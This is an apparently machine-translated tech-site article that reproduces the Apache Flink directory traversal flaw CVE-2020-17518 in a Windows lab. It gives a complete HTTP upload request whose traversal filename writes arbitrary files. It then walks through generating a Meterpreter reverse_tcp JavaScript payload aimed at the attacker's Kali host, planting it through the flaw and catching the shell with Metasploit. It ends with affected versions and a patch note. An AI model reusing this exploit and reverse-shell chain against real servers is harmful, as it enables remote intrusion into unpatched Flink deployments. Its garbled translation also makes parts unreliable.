Shulou(Shulou.com)05/31 Report--

This article introduces the Apache Flink directory traversal vulnerability CVE-2020-17518 WINDOWS environment reproduction is how, the content is very detailed, interested friends can refer to, hope to be helpful to you.

Recurrence of Apache Flink directory traversal vulnerabilities (CVE-2020-17518)

1. Vulnerability reproduction 1.1 vulnerability background

Apache Flink is an open source stream processing framework developed by the Apache Software Foundation. Its core is a distributed stream data stream engine written in Java and Scala. Flink executes arbitrary streaming data programs in data parallelism and pipelining, and the pipelined runtime system of Flink can execute batch and streaming programs. Recently, the official website of Apache released a notice of Apache Flink directory traversal vulnerability (CVE-2020-17518). Remote attackers can traverse directories through REST API to achieve the effect of reading and writing files.

1.2 vulnerability description

CVE-2020-17518: file write vulnerability

Apache Flink version 1.5.1 introduces REST API, which allows attackers to write files anywhere on the local file system through maliciously modified HTTP headers.

1.3 build a vulnerability environment

Flink installation deployment-window local deployment

Flink can run on Linux, Mac OS X, and and Windows operating systems. To run Flink, you must first install JDK 8.x. The vulnerability recurrence environment is built on windows.

For JDK installation, please see: http://www.itclj.com/blog/5920236681c06e672f942ad4

download

Download address on the official website: https://flink.apache.org/zh/downloads.html

Baidu disk: https://pan.baidu.com/s/1kmnXBD_5685cvgmsQ7xEbg extraction code: n9bs

Start

Extract the downloaded flink, go to the bin directory to find start-cluster.ba, and double-click to run.

Port 8081 is enabled by default flink, which can be accessed using http://you-ip:8081

1.3 recurrence of vulnerabilities

The attack plane used this time: kali ip: 192.168.0.105

Target machine: windows 10x64 ip: 192.168.0.102

Copy the following payload to the burpsuit repeater module to send, and a success.txt file will be created under the / Users/admin/AppData/Local/Temp/flink-web-c208315e-b746-4692-8281-1d566b1b8c09/flink-web-ui/ directory under the window host C disk deployed by flink, and the content written by success.txt will be success.

POST / jars/upload HTTP/1.1

Host: you-ip:8081

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0

Accept: * / *

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data; boundary=--7953587633284837342617937085

Content-Length: 7302

Origin: http://you-ip:8081

Connection: close

Referer: http://you-ip:8081/

-- 7953587633284837342617937085

Content-Disposition: form-data; name= "jarfile"; filename= "/ Users/admin/AppData/Local/Temp/flink-web-c208315e-b746-4692-8281-1d566b1b8c09/flink-web-ui/success.txt"

Content-Type: application/octet-stream

Success

7953587633284837342617937085-

You can see that the file success.txt file was created successfully

1.4 bounce shell by writing to a js file

1. First generate the js script for bouncing shell through the ps1encode tool. The download address of the ps1encode tool is git clone https://github.com/CroweCybersecurity/ps1encode.git.

2. Enter the ps1encode directory and generate payload using the command. / ps1encode.rb-- LHOST 192.168.0.105-- LPORT 4444-- PAYLOAD windows/meterpreter/reverse_tcp-- ENCODE cmd-t js

3. Copy the generated payload to burpsuit, and modify the write file named success.js to send.

4. You can see that the succes.js file has been successfully created on the window host deployed by flink

5. Windows execution file

It may be obvious to execute directly, so with reference to the article, we wrote a success.html file with the following contents

It's a surprise.

6. Execute the success.html file, select run-> allow to block content-> select Yes, and the rebound is successful.

7. Obtain shell

Use msf snooping

At present, the rebound shell can establish a connection, but the command cannot be executed. I don't know why.

two。 Scope of influence

CVE-2020-17518:

Apache Flink 1.5.1-1.11.2

3. Severity grade

High risk

4. Solution 4.1 official patch

Apache Flink has officially fixed this vulnerability in the new version, please upgrade to Flink 1.11.3 or 1.12.0, download link: https://flink.apache.org/downloads.html

On the Apache Flink directory traversal vulnerability CVE-2020-17518 WINDOWS environment reproduction is shared here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.